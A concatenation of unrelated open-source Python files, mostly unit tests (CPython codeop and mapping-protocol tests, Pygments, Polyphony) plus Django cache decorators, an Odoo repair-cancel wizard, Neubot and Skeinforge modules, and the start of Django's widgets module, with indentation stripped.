compile_command(str,symbol=symbol)
self.fail("No exception thrown for invalid code")
except SyntaxError:
self.assert_(is_syntax)
except OverflowError:
self.assert_(not is_syntax)
def test_valid(self):
av = self.assertValid
# special case
if not is_jython:
self.assertEquals(compile_command(""),
compile("pass", "<input>", 'single',
PyCF_DONT_IMPLY_DEDENT))
self.assertEquals(compile_command("\n"),
compile("pass", "<input>", 'single',
PyCF_DONT_IMPLY_DEDENT))
else:
av("")
av("\n")
av("a = 1")
av("\na = 1")
av("a = 1\n")
av("a = 1\n\n")
av("\n\na = 1\n\n")
av("def x():\n pass\n")
av("if 1:\n pass\n")
av("\n\nif 1: pass\n")
av("\n\nif 1: pass\n\n")
av("def x():\n\n pass\n")
av("def x():\n pass\n \n")
av("def x():\n pass\n \n")
av("pass\n")
av("3**3\n")
av("if 9==3:\n pass\nelse:\n pass\n")
av("if 1:\n pass\n if 1:\n pass\n else:\n pass\n")
av("#a\n#b\na = 3\n")
av("#a\n\n \na=3\n")
av("a=3\n\n")
av("a = 9+ \\\n3")
av("3**3","eval")
av("(lambda z: \n z**3)","eval")
av("9+ \\\n3","eval")
av("9+ \\\n3\n","eval")
av("\n\na**3","eval")
av("\n \na**3","eval")
av("#a\n#b\na**3","eval")
def test_incomplete(self):
ai = self.assertIncomplete
ai("(a **")
ai("(a,b,")
ai("(a,b,(")
ai("(a,b,(")
ai("a = (")
ai("a = {")
ai("b + {")
ai("if 9==3:\n pass\nelse:")
ai("if 9==3:\n pass\nelse:\n")
ai("if 9==3:\n pass\nelse:\n pass")
ai("if 1:")
ai("if 1:\n")
ai("if 1:\n pass\n if 1:\n pass\n else:")
ai("if 1:\n pass\n if 1:\n pass\n else:\n")
ai("if 1:\n pass\n if 1:\n pass\n else:\n pass")
ai("def x():")
ai("def x():\n")
ai("def x():\n\n")
ai("def x():\n pass")
ai("def x():\n pass\n ")
ai("def x():\n pass\n ")
ai("\n\ndef x():\n pass")
ai("a = 9+ \\")
ai("a = 'a\\")
ai("a = '''xy")
ai("","eval")
ai("\n","eval")
ai("(","eval")
ai("(\n\n\n","eval")
ai("(9+","eval")
ai("9+ \\","eval")
ai("lambda z: \\","eval")
def test_invalid(self):
ai = self.assertInvalid
ai("a b")
ai("a @")
ai("a b @")
ai("a ** @")
ai("a = ")
ai("a = 9 +")
ai("def x():\n\npass\n")
ai("\n\n if 1: pass\n\npass")
ai("a = 9+ \\\n")
ai("a = 'a\\ ")
ai("a = 'a\\\n")
ai("a = 1","eval")
ai("a = (","eval")
ai("]","eval")
ai("())","eval")
ai("[}","eval")
ai("9+","eval")
ai("lambda z:","eval")
ai("a b","eval")
def test_filename(self):
self.assertEquals(compile_command("a = 1\n", "abc").co_filename,
compile("a = 1\n", "abc", 'single').co_filename)
self.assertNotEquals(compile_command("a = 1\n", "abc").co_filename,
compile("a = 1\n", "def", 'single').co_filename)
def test_main():
run_unittest(CodeopTests)
if __name__ == "__main__":
test_main()
|
wskplho/sl4a
|
refs/heads/master
|
python/src/Lib/test/mapping_tests.py
|
56
|
# tests common to dict and UserDict
import unittest
import UserDict
class BasicTestMappingProtocol(unittest.TestCase):
# This base class can be used to check that an object conforms to the
# mapping protocol
# Functions that can be useful to override to adapt to dictionary
# semantics
type2test = None # which class is being tested (overwrite in subclasses)
def _reference(self):
"""Return a dictionary of values which are invariant by storage
in the object under test."""
return {1:2, "key1":"value1", "key2":(1,2,3)}
def _empty_mapping(self):
"""Return an empty mapping object"""
return self.type2test()
def _full_mapping(self, data):
"""Return a mapping object with the value contained in data
dictionary"""
x = self._empty_mapping()
for key, value in data.items():
x[key] = value
return x
def __init__(self, *args, **kw):
unittest.TestCase.__init__(self, *args, **kw)
self.reference = self._reference().copy()
# A (key, value) pair not in the mapping
key, value = self.reference.popitem()
self.other = {key:value}
# A (key, value) pair in the mapping
key, value = self.reference.popitem()
self.inmapping = {key:value}
self.reference[key] = value
def test_read(self):
# Test for read only operations on mapping
p = self._empty_mapping()
p1 = dict(p) #workaround for singleton objects
d = self._full_mapping(self.reference)
if d is p:
p = p1
#Indexing
for key, value in self.reference.items():
self.assertEqual(d[key], value)
knownkey = self.other.keys()[0]
self.failUnlessRaises(KeyError, lambda:d[knownkey])
#len
self.assertEqual(len(p), 0)
self.assertEqual(len(d), len(self.reference))
#has_key
for k in self.reference:
self.assert_(d.has_key(k))
self.assert_(k in d)
for k in self.other:
self.failIf(d.has_key(k))
self.failIf(k in d)
#cmp
self.assertEqual(cmp(p,p), 0)
self.assertEqual(cmp(d,d), 0)
self.assertEqual(cmp(p,d), -1)
self.assertEqual(cmp(d,p), 1)
#__non__zero__
if p: self.fail("Empty mapping must compare to False")
if not d: self.fail("Full mapping must compare to True")
# keys(), items(), iterkeys() ...
def check_iterandlist(iter, lst, ref):
self.assert_(hasattr(iter, 'next'))
self.assert_(hasattr(iter, '__iter__'))
x = list(iter)
self.assert_(set(x)==set(lst)==set(ref))
check_iterandlist(d.iterkeys(), d.keys(), self.reference.keys())
check_iterandlist(iter(d), d.keys(), self.reference.keys())
check_iterandlist(d.itervalues(), d.values(), self.reference.values())
check_iterandlist(d.iteritems(), d.items(), self.reference.items())
#get
key, value = d.iteritems().next()
knownkey, knownvalue = self.other.iteritems().next()
self.assertEqual(d.get(key, knownvalue), value)
self.assertEqual(d.get(knownkey, knownvalue), knownvalue)
self.failIf(knownkey in d)
def test_write(self):
# Test for write operations on mapping
p = self._empty_mapping()
#Indexing
for key, value in self.reference.items():
p[key] = value
self.assertEqual(p[key], value)
for key in self.reference.keys():
del p[key]
self.failUnlessRaises(KeyError, lambda:p[key])
p = self._empty_mapping()
#update
p.update(self.reference)
self.assertEqual(dict(p), self.reference)
items = p.items()
p = self._empty_mapping()
p.update(items)
self.assertEqual(dict(p), self.reference)
d = self._full_mapping(self.reference)
#setdefault
key, value = d.iteritems().next()
knownkey, knownvalue = self.other.iteritems().next()
self.assertEqual(d.setdefault(key, knownvalue), value)
self.assertEqual(d[key], value)
self.assertEqual(d.setdefault(knownkey, knownvalue), knownvalue)
self.assertEqual(d[knownkey], knownvalue)
#pop
self.assertEqual(d.pop(knownkey), knownvalue)
self.failIf(knownkey in d)
self.assertRaises(KeyError, d.pop, knownkey)
default = 909
d[knownkey] = knownvalue
self.assertEqual(d.pop(knownkey, default), knownvalue)
self.failIf(knownkey in d)
self.assertEqual(d.pop(knownkey, default), default)
#popitem
key, value = d.popitem()
self.failIf(key in d)
self.assertEqual(value, self.reference[key])
p=self._empty_mapping()
self.assertRaises(KeyError, p.popitem)
def test_constructor(self):
self.assertEqual(self._empty_mapping(), self._empty_mapping())
def test_bool(self):
self.assert_(not self._empty_mapping())
self.assert_(self.reference)
self.assert_(bool(self._empty_mapping()) is False)
self.assert_(bool(self.reference) is True)
def test_keys(self):
d = self._empty_mapping()
self.assertEqual(d.keys(), [])
d = self.reference
self.assert_(self.inmapping.keys()[0] in d.keys())
self.assert_(self.other.keys()[0] not in d.keys())
self.assertRaises(TypeError, d.keys, None)
def test_values(self):
d = self._empty_mapping()
self.assertEqual(d.values(), [])
self.assertRaises(TypeError, d.values, None)
def test_items(self):
d = self._empty_mapping()
self.assertEqual(d.items(), [])
self.assertRaises(TypeError, d.items, None)
def test_len(self):
d = self._empty_mapping()
self.assertEqual(len(d), 0)
def test_getitem(self):
d = self.reference
self.assertEqual(d[self.inmapping.keys()[0]], self.inmapping.values()[0])
self.assertRaises(TypeError, d.__getitem__)
def test_update(self):
# mapping argument
d = self._empty_mapping()
d.update(self.other)
self.assertEqual(d.items(), self.other.items())
# No argument
d = self._empty_mapping()
d.update()
self.assertEqual(d, self._empty_mapping())
# item sequence
d = self._empty_mapping()
d.update(self.other.items())
self.assertEqual(d.items(), self.other.items())
# Iterator
d = self._empty_mapping()
d.update(self.other.iteritems())
self.assertEqual(d.items(), self.other.items())
# FIXME: Doesn't work with UserDict
# self.assertRaises((TypeError, AttributeError), d.update, None)
self.assertRaises((TypeError, AttributeError), d.update, 42)
outerself = self
class SimpleUserDict:
def __init__(self):
self.d = outerself.reference
def keys(self):
return self.d.keys()
def __getitem__(self, i):
return self.d[i]
d.clear()
d.update(SimpleUserDict())
i1 = d.items()
i2 = self.reference.items()
i1.sort()
i2.sort()
self.assertEqual(i1, i2)
class Exc(Exception): pass
d = self._empty_mapping()
class FailingUserDict:
def keys(self):
raise Exc
self.assertRaises(Exc, d.update, FailingUserDict())
d.clear()
class FailingUserDict:
def keys(self):
class BogonIter:
def __init__(self):
self.i = 1
def __iter__(self):
return self
def next(self):
if self.i:
self.i = 0
return 'a'
raise Exc
return BogonIter()
def __getitem__(self, key):
return key
self.assertRaises(Exc, d.update, FailingUserDict())
class FailingUserDict:
def keys(self):
class BogonIter:
def __init__(self):
self.i = ord('a')
def __iter__(self):
return self
def next(self):
if self.i <= ord('z'):
rtn = chr(self.i)
self.i += 1
return rtn
raise StopIteration
return BogonIter()
def __getitem__(self, key):
raise Exc
self.assertRaises(Exc, d.update, FailingUserDict())
d = self._empty_mapping()
class badseq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, d.update, badseq())
self.assertRaises(ValueError, d.update, [(1, 2, 3)])
# no test_fromkeys or test_copy as both os.environ and selves don't support it
def test_get(self):
d = self._empty_mapping()
self.assert_(d.get(self.other.keys()[0]) is None)
self.assertEqual(d.get(self.other.keys()[0], 3), 3)
d = self.reference
self.assert_(d.get(self.other.keys()[0]) is None)
self.assertEqual(d.get(self.other.keys()[0], 3), 3)
self.assertEqual(d.get(self.inmapping.keys()[0]), self.inmapping.values()[0])
self.assertEqual(d.get(self.inmapping.keys()[0], 3), self.inmapping.values()[0])
self.assertRaises(TypeError, d.get)
self.assertRaises(TypeError, d.get, None, None, None)
def test_setdefault(self):
d = self._empty_mapping()
self.assertRaises(TypeError, d.setdefault)
def test_popitem(self):
d = self._empty_mapping()
self.assertRaises(KeyError, d.popitem)
self.assertRaises(TypeError, d.popitem, 42)
def test_pop(self):
d = self._empty_mapping()
k, v = self.inmapping.items()[0]
d[k] = v
self.assertRaises(KeyError, d.pop, self.other.keys()[0])
self.assertEqual(d.pop(k), v)
self.assertEqual(len(d), 0)
self.assertRaises(KeyError, d.pop, k)
class TestMappingProtocol(BasicTestMappingProtocol):
def test_constructor(self):
BasicTestMappingProtocol.test_constructor(self)
self.assert_(self._empty_mapping() is not self._empty_mapping())
self.assertEqual(self.type2test(x=1, y=2), {"x": 1, "y": 2})
def test_bool(self):
BasicTestMappingProtocol.test_bool(self)
self.assert_(not self._empty_mapping())
self.assert_(self._full_mapping({"x": "y"}))
self.assert_(bool(self._empty_mapping()) is False)
self.assert_(bool(self._full_mapping({"x": "y"})) is True)
def test_keys(self):
BasicTestMappingProtocol.test_keys(self)
d = self._empty_mapping()
self.assertEqual(d.keys(), [])
d = self._full_mapping({'a': 1, 'b': 2})
k = d.keys()
self.assert_('a' in k)
self.assert_('b' in k)
self.assert_('c' not in k)
def test_values(self):
BasicTestMappingProtocol.test_values(self)
d = self._full_mapping({1:2})
self.assertEqual(d.values(), [2])
def test_items(self):
BasicTestMappingProtocol.test_items(self)
d = self._full_mapping({1:2})
self.assertEqual(d.items(), [(1, 2)])
def test_has_key(self):
d = self._empty_mapping()
self.assert_(not d.has_key('a'))
d = self._full_mapping({'a': 1, 'b': 2})
k = d.keys()
k.sort()
self.assertEqual(k, ['a', 'b'])
self.assertRaises(TypeError, d.has_key)
def test_contains(self):
d = self._empty_mapping()
self.assert_(not ('a' in d))
self.assert_('a' not in d)
d = self._full_mapping({'a': 1, 'b': 2})
self.assert_('a' in d)
self.assert_('b' in d)
self.assert_('c' not in d)
self.assertRaises(TypeError, d.__contains__)
def test_len(self):
BasicTestMappingProtocol.test_len(self)
d = self._full_mapping({'a': 1, 'b': 2})
self.assertEqual(len(d), 2)
def test_getitem(self):
BasicTestMappingProtocol.test_getitem(self)
d = self._full_mapping({'a': 1, 'b': 2})
self.assertEqual(d['a'], 1)
self.assertEqual(d['b'], 2)
d['c'] = 3
d['a'] = 4
self.assertEqual(d['c'], 3)
self.assertEqual(d['a'], 4)
del d['b']
self.assertEqual(d, {'a': 4, 'c': 3})
self.assertRaises(TypeError, d.__getitem__)
def test_clear(self):
d = self._full_mapping({1:1, 2:2, 3:3})
d.clear()
self.assertEqual(d, {})
self.assertRaises(TypeError, d.clear, None)
def test_update(self):
BasicTestMappingProtocol.test_update(self)
# mapping argument
d = self._empty_mapping()
d.update({1:100})
d.update({2:20})
d.update({1:1, 2:2, 3:3})
self.assertEqual(d, {1:1, 2:2, 3:3})
# no argument
d.update()
self.assertEqual(d, {1:1, 2:2, 3:3})
# keyword arguments
d = self._empty_mapping()
d.update(x=100)
d.update(y=20)
d.update(x=1, y=2, z=3)
self.assertEqual(d, {"x":1, "y":2, "z":3})
# item sequence
d = self._empty_mapping()
d.update([("x", 100), ("y", 20)])
self.assertEqual(d, {"x":100, "y":20})
# Both item sequence and keyword arguments
d = self._empty_mapping()
d.update([("x", 100), ("y", 20)], x=1, y=2)
self.assertEqual(d, {"x":1, "y":2})
# iterator
d = self._full_mapping({1:3, 2:4})
d.update(self._full_mapping({1:2, 3:4, 5:6}).iteritems())
self.assertEqual(d, {1:2, 2:4, 3:4, 5:6})
class SimpleUserDict:
def __init__(self):
self.d = {1:1, 2:2, 3:3}
def keys(self):
return self.d.keys()
def __getitem__(self, i):
return self.d[i]
d.clear()
d.update(SimpleUserDict())
self.assertEqual(d, {1:1, 2:2, 3:3})
def test_fromkeys(self):
self.assertEqual(self.type2test.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
d = self._empty_mapping()
self.assert_(not(d.fromkeys('abc') is d))
self.assertEqual(d.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
self.assertEqual(d.fromkeys((4,5),0), {4:0, 5:0})
self.assertEqual(d.fromkeys([]), {})
def g():
yield 1
self.assertEqual(d.fromkeys(g()), {1:None})
self.assertRaises(TypeError, {}.fromkeys, 3)
class dictlike(self.type2test): pass
self.assertEqual(dictlike.fromkeys('a'), {'a':None})
self.assertEqual(dictlike().fromkeys('a'), {'a':None})
self.assert_(dictlike.fromkeys('a').__class__ is dictlike)
self.assert_(dictlike().fromkeys('a').__class__ is dictlike)
# FIXME: the following won't work with UserDict, because it's an old style class
# self.assert_(type(dictlike.fromkeys('a')) is dictlike)
class mydict(self.type2test):
def __new__(cls):
return UserDict.UserDict()
ud = mydict.fromkeys('ab')
self.assertEqual(ud, {'a':None, 'b':None})
# FIXME: the following won't work with UserDict, because it's an old style class
# self.assert_(isinstance(ud, UserDict.UserDict))
self.assertRaises(TypeError, dict.fromkeys)
class Exc(Exception): pass
class baddict1(self.type2test):
def __init__(self):
raise Exc()
self.assertRaises(Exc, baddict1.fromkeys, [1])
class BadSeq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, self.type2test.fromkeys, BadSeq())
class baddict2(self.type2test):
def __setitem__(self, key, value):
raise Exc()
self.assertRaises(Exc, baddict2.fromkeys, [1])
def test_copy(self):
d = self._full_mapping({1:1, 2:2, 3:3})
self.assertEqual(d.copy(), {1:1, 2:2, 3:3})
d = self._empty_mapping()
self.assertEqual(d.copy(), d)
self.assert_(isinstance(d.copy(), d.__class__))
self.assertRaises(TypeError, d.copy, None)
def test_get(self):
BasicTestMappingProtocol.test_get(self)
d = self._empty_mapping()
self.assert_(d.get('c') is None)
self.assertEqual(d.get('c', 3), 3)
d = self._full_mapping({'a' : 1, 'b' : 2})
self.assert_(d.get('c') is None)
self.assertEqual(d.get('c', 3), 3)
self.assertEqual(d.get('a'), 1)
self.assertEqual(d.get('a', 3), 1)
def test_setdefault(self):
BasicTestMappingProtocol.test_setdefault(self)
d = self._empty_mapping()
self.assert_(d.setdefault('key0') is None)
d.setdefault('key0', [])
self.assert_(d.setdefault('key0') is None)
d.setdefault('key', []).append(3)
self.assertEqual(d['key'][0], 3)
d.setdefault('key', []).append(4)
self.assertEqual(len(d['key']), 2)
def test_popitem(self):
BasicTestMappingProtocol.test_popitem(self)
for copymode in -1, +1:
# -1: b has same structure as a
# +1: b is a.copy()
for log2size in range(12):
size = 2**log2size
a = self._empty_mapping()
b = self._empty_mapping()
for i in range(size):
a[repr(i)] = i
if copymode < 0:
b[repr(i)] = i
if copymode > 0:
b = a.copy()
for i in range(size):
ka, va = ta = a.popitem()
self.assertEqual(va, int(ka))
kb, vb = tb = b.popitem()
self.assertEqual(vb, int(kb))
self.assert_(not(copymode < 0 and ta != tb))
self.assert_(not a)
self.assert_(not b)
def test_pop(self):
BasicTestMappingProtocol.test_pop(self)
# Tests for pop with specified key
d = self._empty_mapping()
k, v = 'abc', 'def'
# verify longs/ints get same value when key > 32 bits (for 64-bit archs)
# see SF bug #689659
x = 4503599627370496L
y = 4503599627370496
h = self._full_mapping({x: 'anything', y: 'something else'})
self.assertEqual(h[x], h[y])
self.assertEqual(d.pop(k, v), v)
d[k] = v
self.assertEqual(d.pop(k, 1), v)
class TestHashMappingProtocol(TestMappingProtocol):
def test_getitem(self):
TestMappingProtocol.test_getitem(self)
class Exc(Exception): pass
class BadEq(object):
def __eq__(self, other):
raise Exc()
def __hash__(self):
return 24
d = self._empty_mapping()
d[BadEq()] = 42
self.assertRaises(KeyError, d.__getitem__, 23)
class BadHash(object):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
d = self._empty_mapping()
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.__getitem__, x)
def test_fromkeys(self):
TestMappingProtocol.test_fromkeys(self)
class mydict(self.type2test):
def __new__(cls):
return UserDict.UserDict()
ud = mydict.fromkeys('ab')
self.assertEqual(ud, {'a':None, 'b':None})
self.assert_(isinstance(ud, UserDict.UserDict))
def test_pop(self):
TestMappingProtocol.test_pop(self)
class Exc(Exception): pass
class BadHash(object):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
d = self._empty_mapping()
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.pop, x)
def test_mutatingiteration(self):
d = self._empty_mapping()
d[1] = 1
try:
for i in d:
d[i+1] = 1
except RuntimeError:
pass
else:
self.fail("changing dict size during iteration doesn't raise Error")
def test_repr(self):
d = self._empty_mapping()
self.assertEqual(repr(d), '{}')
d[1] = 2
self.assertEqual(repr(d), '{1: 2}')
d = self._empty_mapping()
d[1] = d
self.assertEqual(repr(d), '{1: {...}}')
class Exc(Exception): pass
class BadRepr(object):
def __repr__(self):
raise Exc()
d = self._full_mapping({1: BadRepr()})
self.assertRaises(Exc, repr, d)
def test_le(self):
self.assert_(not (self._empty_mapping() < self._empty_mapping()))
self.assert_(not (self._full_mapping({1: 2}) < self._full_mapping({1L: 2L})))
class Exc(Exception): pass
class BadCmp(object):
def __eq__(self, other):
raise Exc()
def __hash__(self):
return 42
d1 = self._full_mapping({BadCmp(): 1})
d2 = self._full_mapping({1: 1})
try:
d1 < d2
except Exc:
pass
else:
self.fail("< didn't raise Exc")
def test_setdefault(self):
TestMappingProtocol.test_setdefault(self)
class Exc(Exception): pass
class BadHash(object):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
d = self._empty_mapping()
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.setdefault, x, [])
|
bassosimone/neubot-server
|
refs/heads/master
|
neubot/negotiate_server_module.py
|
2
|
# neubot/negotiate/server.py
#
# Copyright (c) 2011 Simone Basso <bassosimone@gmail.com>,
# NEXA Center for Internet & Society at Politecnico di Torino
#
# This file is part of Neubot <http://www.neubot.org/>.
#
# Neubot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Neubot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Neubot. If not, see <http://www.gnu.org/licenses/>.
#
''' Negotiate server '''
class NegotiateServerModule(object):
''' Each test should implement this interface '''
# The minimal collect echoes the request body
def collect(self, stream, request_body):
''' Invoked at the end of the test, to collect data '''
return request_body
# Only speedtest reimplements this method
def collect_legacy(self, stream, request_body, request):
''' Legacy interface to collect that also receives the
request object: speedtest needs to inspect the Authorization
header when the connecting client is pretty old '''
return self.collect(stream, request_body)
# The minimal unchoke returns the stream unique identifier only
def unchoke(self, stream, request_body):
''' Invoked when a stream is authorized to take the test '''
return { 'authorization': str(hash(stream)) }
|
ktok07b6/polyphony
|
refs/heads/master
|
tests/module/nesting01.py
|
1
|
from polyphony import module
from polyphony import testbench
from polyphony import is_worker_running
from polyphony.io import Port
from polyphony.typing import int8
from polyphony.timing import clksleep
@module
class Submodule:
def __init__(self, param):
self.i = Port(int8, 'in')
self.o = Port(int8, 'out')
self.param = param
@module
class Nesting01:
def __init__(self):
self.sub1 = Submodule(2)
self.sub2 = Submodule(3)
self.append_worker(self.worker, self.sub1)
self.append_worker(self.worker, self.sub2)
def worker(self, sub):
while is_worker_running():
v = sub.i.rd() * sub.param
sub.o.wr(v)
@testbench
def test(m):
m.sub1.i.wr(10)
m.sub2.i.wr(20)
clksleep(10)
assert m.sub1.o.rd() == 20
assert m.sub2.o.rd() == 60
m = Nesting01()
test(m)
|
ehirt/odoo
|
refs/heads/8.0
|
addons/mrp_repair/wizard/cancel_repair.py
|
384
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv,fields
from openerp.tools.translate import _
class repair_cancel(osv.osv_memory):
_name = 'mrp.repair.cancel'
_description = 'Cancel Repair'
def cancel_repair(self, cr, uid, ids, context=None):
""" Cancels the repair
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return:
"""
if context is None:
context = {}
record_id = context and context.get('active_id', False) or False
assert record_id, _('Active ID not Found')
repair_order_obj = self.pool.get('mrp.repair')
repair_line_obj = self.pool.get('mrp.repair.line')
repair_order = repair_order_obj.browse(cr, uid, record_id, context=context)
if repair_order.invoiced or repair_order.invoice_method == 'none':
repair_order_obj.action_cancel(cr, uid, [record_id], context=context)
else:
raise osv.except_osv(_('Warning!'),_('Repair order is not invoiced.'))
return {'type': 'ir.actions.act_window_close'}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
""" Changes the view dynamically
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param context: A standard dictionary
@return: New arch of view.
"""
if context is None:
context = {}
res = super(repair_cancel, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
record_id = context and context.get('active_id', False) or False
active_model = context.get('active_model')
if not record_id or (active_model and active_model != 'mrp.repair'):
return res
repair_order = self.pool.get('mrp.repair').browse(cr, uid, record_id, context=context)
if not repair_order.invoiced:
res['arch'] = """
<form string="Cancel Repair" version="7.0">
<header>
<button name="cancel_repair" string="_Yes" type="object" class="oe_highlight"/>
or
<button string="Cancel" class="oe_link" special="cancel"/>
</header>
<label string="Do you want to continue?"/>
</form>
"""
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
lucychambers/lucychambers.github.io
|
refs/heads/master
|
.bundle/ruby/2.0.0/gems/pygments.rb-0.6.0/vendor/pygments-main/tests/test_latex_formatter.py
|
32
|
# -*- coding: utf-8 -*-
"""
Pygments LaTeX formatter tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import print_function
import os
import unittest
import tempfile
from pygments.formatters import LatexFormatter
from pygments.lexers import PythonLexer
import support
TESTFILE, TESTDIR = support.location(__file__)
class LatexFormatterTest(unittest.TestCase):
def test_valid_output(self):
fp = open(TESTFILE)
try:
tokensource = list(PythonLexer().get_tokens(fp.read()))
finally:
fp.close()
fmt = LatexFormatter(full=True, encoding='latin1')
handle, pathname = tempfile.mkstemp('.tex')
# place all output files in /tmp too
old_wd = os.getcwd()
os.chdir(os.path.dirname(pathname))
tfile = os.fdopen(handle, 'wb')
fmt.format(tokensource, tfile)
tfile.close()
try:
import subprocess
po = subprocess.Popen(['latex', '-interaction=nonstopmode',
pathname], stdout=subprocess.PIPE)
ret = po.wait()
output = po.stdout.read()
po.stdout.close()
except OSError:
# latex not available
pass
else:
if ret:
print(output)
self.assertFalse(ret, 'latex run reported errors')
os.unlink(pathname)
os.chdir(old_wd)
|
Avinash-Raj/appengine-django-skeleton
|
refs/heads/master
|
lib/django/views/decorators/cache.py
|
586
|
from functools import wraps
from django.middleware.cache import CacheMiddleware
from django.utils.cache import add_never_cache_headers, patch_cache_control
from django.utils.decorators import (
available_attrs, decorator_from_middleware_with_args,
)
def cache_page(*args, **kwargs):
"""
Decorator for views that tries getting the page from the cache and
populates the cache if the page isn't in the cache yet.
The cache is keyed by the URL and some data from the headers.
Additionally there is the key prefix that is used to distinguish different
cache areas in a multi-site setup. You could use the
get_current_site().domain, for example, as that is unique across a Django
project.
Additionally, all headers from the response's Vary header will be taken
into account on caching -- just like the middleware does.
"""
# We also add some asserts to give better error messages in case people are
# using other ways to call cache_page that no longer work.
if len(args) != 1 or callable(args[0]):
raise TypeError("cache_page has a single mandatory positional argument: timeout")
cache_timeout = args[0]
cache_alias = kwargs.pop('cache', None)
key_prefix = kwargs.pop('key_prefix', None)
if kwargs:
raise TypeError("cache_page has two optional keyword arguments: cache and key_prefix")
return decorator_from_middleware_with_args(CacheMiddleware)(
cache_timeout=cache_timeout, cache_alias=cache_alias, key_prefix=key_prefix
)
def cache_control(**kwargs):
def _cache_controller(viewfunc):
@wraps(viewfunc, assigned=available_attrs(viewfunc))
def _cache_controlled(request, *args, **kw):
response = viewfunc(request, *args, **kw)
patch_cache_control(response, **kwargs)
return response
return _cache_controlled
return _cache_controller
def never_cache(view_func):
"""
Decorator that adds headers to a response so that it will
never be cached.
"""
@wraps(view_func, assigned=available_attrs(view_func))
def _wrapped_view_func(request, *args, **kwargs):
response = view_func(request, *args, **kwargs)
add_never_cache_headers(response)
return response
return _wrapped_view_func
|
makerbot/ReplicatorG
|
refs/heads/master
|
skein_engines/skeinforge-35/skeinforge_application/skeinforge_plugins/profile_plugins/winding.py
|
6
|
"""
This page is in the table of contents.
Winding is a script to set the winding profile for the skeinforge chain.
The displayed craft sequence is the sequence in which the tools craft the model and export the output.
On the winding dialog, clicking the 'Add Profile' button will duplicate the selected profile and give it the name in the input field. For example, if laser is selected and the name laser_10mm is in the input field, clicking the 'Add Profile' button will duplicate laser and save it as laser_10mm. The 'Delete Profile' button deletes the selected profile.
The profile selection is the setting. If you hit 'Save and Close' the selection will be saved, if you hit 'Cancel' the selection will not be saved. However; adding and deleting a profile is a permanent action, for example 'Cancel' will not bring back any deleted profiles.
To change the winding profile, in a shell in the profile_plugins folder type:
> python winding.py
An example of using winding from the python interpreter follows below.
> python
Python 2.5.1 (r251:54863, Sep 22 2007, 01:43:31)
[GCC 4.2.1 (SUSE Linux)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import winding
>>> winding.main()
This brings up the winding setting dialog.
"""
from __future__ import absolute_import
import __init__
from fabmetheus_utilities import settings
from skeinforge_application.skeinforge_utilities import skeinforge_profile
import sys
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GPL 3.0'
def getCraftSequence():
"Get the winding craft sequence."
return 'cleave,preface,coil,flow,feed,home,lash,fillet,limit,dimension,unpause,export'.split(',')
def getNewRepository():
"Get the repository constructor."
return WindingRepository()
class WindingRepository:
"A class to handle the winding settings."
def __init__(self):
"Set the default settings, execute title & settings fileName."
skeinforge_profile.addListsSetCraftProfile( getCraftSequence(), 'free_wire', self, 'skeinforge_plugins.profile_plugins.winding.html')
def main():
"Display the export dialog."
if len(sys.argv) > 1:
writeOutput(' '.join(sys.argv[1 :]))
else:
settings.startMainLoopFromConstructor( getNewRepository() )
if __name__ == "__main__":
main()
|
dex4er/django
|
refs/heads/1.6.x
|
tests/urlpatterns_reverse/erroneous_views_module.py
|
157
|
import non_existent
def erroneous_view(request):
pass
|
jdelight/django
|
refs/heads/master
|
django/forms/widgets.py
|
18
|
"""
HTML Widget classes
"""
from __future__ import unicode_literals
import copy
import datetime
import re
from itertools import chain
from django.conf import settings
from django.forms.utils import flatatt, to_current_timezone
from django.utils import datetime_safe, formats, six
from django.utils.datastructures import MultiValueDict
from django.utils.dates import MONTHS
from django.utils.encoding import (
force_str, force_text, python_2_unicode_compatible,
)
from django.utils.formats import get_format
from django.utils.html import conditional_escape, format_html, html_safe
from django.utils.safestring import mark_safe
from django.utils.six.moves import range
from django.utils.six.moves.urllib.parse import urljoin
from django.utils.translation import ugettext_lazy
__all__ = (
'Media', 'MediaDefiningClass', 'Widget', 'TextInput', 'NumberInput',
'EmailInput', 'URLInput', 'PasswordInput', 'HiddenInput',
'MultipleHiddenInput', 'FileInput', 'ClearableFileInput', 'Textarea',
